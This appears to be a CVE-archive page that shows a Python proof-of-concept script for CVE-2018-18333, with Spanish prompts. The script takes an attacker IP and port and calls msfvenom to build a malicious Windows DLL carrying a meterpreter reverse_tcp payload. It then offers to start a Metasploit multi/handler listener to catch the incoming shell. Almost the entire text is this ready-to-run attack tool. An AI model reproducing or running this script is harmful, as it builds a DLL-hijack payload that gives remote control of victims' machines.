4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / Dr.dll.py PY
#!/usr/bin/python
# _*_ coding: utf8 _*_
import os
W = '\033[37m'
R = '\033[0;31m'  # red
G = '\033[0;32m'  # green
O = '\033[0;33m'  # orange
B = '\033[0;34m'  # blue
P = '\033[0;35m'  # purple
C = '\033[0;36m'  # cyan
GR = '\033[0;37m'  # gray

####################################################
## MSFVENOM GEN DLL METERPRETER  - CVE-2018-18333 ##
####################################################

def banner():
	print(G+"""

.----. .----.    .----. .-.   .-.   
| []  \| []  }   | []  \| |   | |   
|     /| .-. \   |     /| `--.| `--.
`----' `-' `-'   `----' `----'`----' v1.0.2 (Demo Simple)
                                              By Mrx04Programmer
""")

ip = input(C+"IP LOCAL >> "+W)
port = input(C+"PUERTO LOCAL >> "+W)
file = input(C+"NOMBRE DE ARCHIVO(Ex: Systems) >> "+W)
filename = file+".dll"
os.system("clear")
banner()
print(G+"[X] "+W+"Ip establecida como "+G+ip+W+".")
print(G+"[X] "+W+"Puerto establecido como "+G+port+W+".")
print(O+"[X] "+W+"Generando dll malicioso...")
msf = os.system("sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST="+ip+" LPORT="+port+" -f dll > "+filename)
if msf == 0:
	print(B+"[*] "+W+"Archivo DLL generado exitamente ("+G+filename+W+").")
	desea = input("Desea iniciar metasploit?[S/n]")
	if desea == "S" or desea == "s":
		os.system("sudo msfconsole -x 'use exploit/multi/handler'")
	if desea == "N" or desea == "n":
		exit()
else:
	print(R+"[-] "+W+"No se pudo generar el archivo exitosamente, instale corectamente metasploit..")